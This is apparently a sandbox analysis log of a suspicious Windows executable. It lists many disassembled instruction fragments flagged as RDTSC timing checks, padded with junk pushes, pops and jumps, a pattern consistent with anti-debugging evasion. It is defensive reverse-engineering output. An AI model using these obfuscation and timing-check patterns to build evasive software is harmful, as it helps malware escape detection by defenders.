Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A25D5E second address: A25D7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007FE9A87AE1E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pushad 0x0000000e push esi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 jnp 00007FE9A87AE1E6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A25D7A second address: A25D80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A25FF9 second address: A25FFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A25FFF second address: A26028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FE9A9298656h 0x0000000a popad 0x0000000b jne 00007FE9A929865Ah 0x00000011 push edx 0x00000012 pop edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jmp 00007FE9A9298661h 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26312 second address: A26329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9A87AE1F3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26329 second address: A26335 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FE9A9298656h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26499 second address: A264AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A264AF second address: A264B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A264B5 second address: A264C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FE9A87AE1E6h 0x0000000a jnp 00007FE9A87AE1E6h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A264C6 second address: A26511 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FE9A9298664h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE9A9298667h 0x00000012 jmp 00007FE9A9298668h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A266B3 second address: A266BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A266BB second address: A266C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 js 00007FE9A9298656h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A266C9 second address: A266D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FE9A87AE1E6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26845 second address: A2684A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2684A second address: A26850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A269D0 second address: A269D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B7B1F second address: 9B7B30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1EBh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2B23E second address: A2B250 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE9A9298656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007FE9A929865Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2B250 second address: A2B257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2B549 second address: A2B54F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2B7E7 second address: A2B808 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1F7h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2AF62 second address: A2AF66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2AF66 second address: A2AF6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2BD8B second address: A2BD97 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE9A929865Eh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2BD97 second address: A2BDC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9A87AE1F1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE9A87AE1ECh 0x00000013 jng 00007FE9A87AE1E6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2BF1E second address: A2BF26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2F843 second address: A2F847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2F847 second address: A2F84D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2F84D second address: A2F852 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A34053 second address: A34058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A34058 second address: A34064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FE9A87AE1E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A34064 second address: A34068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A34068 second address: A34078 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1ECh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FCCB1 second address: 9D959F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a push ecx 0x0000000b mov dh, F3h 0x0000000d pop ecx 0x0000000e call dword ptr [ebp+122D1B21h] 0x00000014 pushad 0x00000015 jbe 00007FE9A9298658h 0x0000001b pushad 0x0000001c jmp 00007FE9A9298664h 0x00000021 jmp 00007FE9A9298665h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FCD55 second address: 9FCD5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FD22C second address: 9FD230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FD37C second address: 9FD380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FD457 second address: 9FD45D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FD45D second address: 9FD461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FD461 second address: 9FD465 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FDA86 second address: 9FDA93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FDA93 second address: 9FDA97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FDA97 second address: 9FDA9D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FDA9D second address: 9FDAA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FE9A9298656h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FDAA7 second address: 9FDAAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FDAAB second address: 9FDAEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jnp 00007FE9A929866Ch 0x0000000f call 00007FE9A9298660h 0x00000014 mov ecx, 52E85605h 0x00000019 pop ecx 0x0000001a push 0000001Eh 0x0000001c stc 0x0000001d pushad 0x0000001e movsx eax, bx 0x00000021 mov dx, ax 0x00000024 popad 0x00000025 push eax 0x00000026 jo 00007FE9A9298662h 0x0000002c ja 00007FE9A929865Ch 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FDBEE second address: 9FDC0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9A87AE1F5h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FDE9F second address: 9FDEEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A9298666h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FE9A929865Fh 0x0000000f nop 0x00000010 mov dword ptr [ebp+122D2EF1h], ecx 0x00000016 movzx edx, cx 0x00000019 lea eax, dword ptr [ebp+1248EA78h] 0x0000001f mov edi, 03A41121h 0x00000024 jnc 00007FE9A9298657h 0x0000002a push eax 0x0000002b push edi 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FDEEB second address: 9FDEEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FDEEF second address: 9FDF61 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FE9A9298658h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 lea eax, dword ptr [ebp+1248EA34h] 0x0000002a push 00000000h 0x0000002c push ebp 0x0000002d call 00007FE9A9298658h 0x00000032 pop ebp 0x00000033 mov dword ptr [esp+04h], ebp 0x00000037 add dword ptr [esp+04h], 00000019h 0x0000003f inc ebp 0x00000040 push ebp 0x00000041 ret 0x00000042 pop ebp 0x00000043 ret 0x00000044 pushad 0x00000045 jmp 00007FE9A9298662h 0x0000004a mov dx, CD01h 0x0000004e popad 0x0000004f nop 0x00000050 pushad 0x00000051 pushad 0x00000052 push edx 0x00000053 pop edx 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A33413 second address: A3344A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FE9A87AE1F5h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FE9A87AE1EAh 0x00000013 jmp 00007FE9A87AE1F0h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3344A second address: A3344F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3344F second address: A33455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A33455 second address: A33475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9A9298667h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A33475 second address: A33479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A33722 second address: A33744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FE9A929866Eh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A33744 second address: A3379E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1F3h 0x00000007 push ebx 0x00000008 push esi 0x00000009 pop esi 0x0000000a je 00007FE9A87AE1E6h 0x00000010 pop ebx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007FE9A87AE1F0h 0x0000001b jmp 00007FE9A87AE1F4h 0x00000020 push edx 0x00000021 pop edx 0x00000022 popad 0x00000023 jmp 00007FE9A87AE1EFh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3379E second address: A337B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A9298666h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A337B9 second address: A337BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3D08B second address: A3D08F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3D289 second address: A3D291 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3D59D second address: A3D5AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FE9A9298656h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3D5AE second address: A3D5B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3D5B4 second address: A3D5DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FE9A929866Ch 0x0000000c jmp 00007FE9A9298666h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3D5DA second address: A3D5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3D5DE second address: A3D5E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3D8CB second address: A3D8D5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE9A87AE1E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3D8D5 second address: A3D8E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FE9A9298656h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3D8E1 second address: A3D8FF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FE9A87AE1E8h 0x00000010 pushad 0x00000011 popad 0x00000012 jnc 00007FE9A87AE1ECh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3D8FF second address: A3D905 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3DA5A second address: A3DA67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jo 00007FE9A87AE1E6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3DA67 second address: A3DA8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FE9A9298656h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jbe 00007FE9A929865Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 jc 00007FE9A9298656h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3DA8B second address: A3DA8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3DD37 second address: A3DD41 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE9A929865Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3DE8F second address: A3DE95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A40E5E second address: A40E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A40E67 second address: A40E6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A40935 second address: A4094C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FE9A9298656h 0x0000000a pop edx 0x0000000b jne 00007FE9A929865Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4094C second address: A40967 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1F1h 0x00000007 jbe 00007FE9A87AE1F2h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A40967 second address: A40978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FE9A9298656h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A40978 second address: A409A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9A87AE1F0h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FE9A87AE1F5h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A409A7 second address: A409AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A40AF6 second address: A40AFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A40AFA second address: A40B00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A40B00 second address: A40B05 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A40B05 second address: A40B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A43E72 second address: A43E92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE9A87AE1F9h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A43B0E second address: A43B4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A9298664h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE9A9298663h 0x00000010 jmp 00007FE9A9298662h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A461FC second address: A46227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9A87AE1EFh 0x00000009 popad 0x0000000a push ecx 0x0000000b jmp 00007FE9A87AE1F2h 0x00000010 pop ecx 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A49032 second address: A49036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A49036 second address: A49040 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE9A87AE1E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A49040 second address: A49058 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FE9A9298656h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007FE9A9298656h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A49058 second address: A4905C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4905C second address: A49060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4D3AE second address: A4D3C9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE9A87AE1E6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jno 00007FE9A87AE1E6h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4C6F8 second address: A4C6FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4C6FE second address: A4C70E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1ECh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
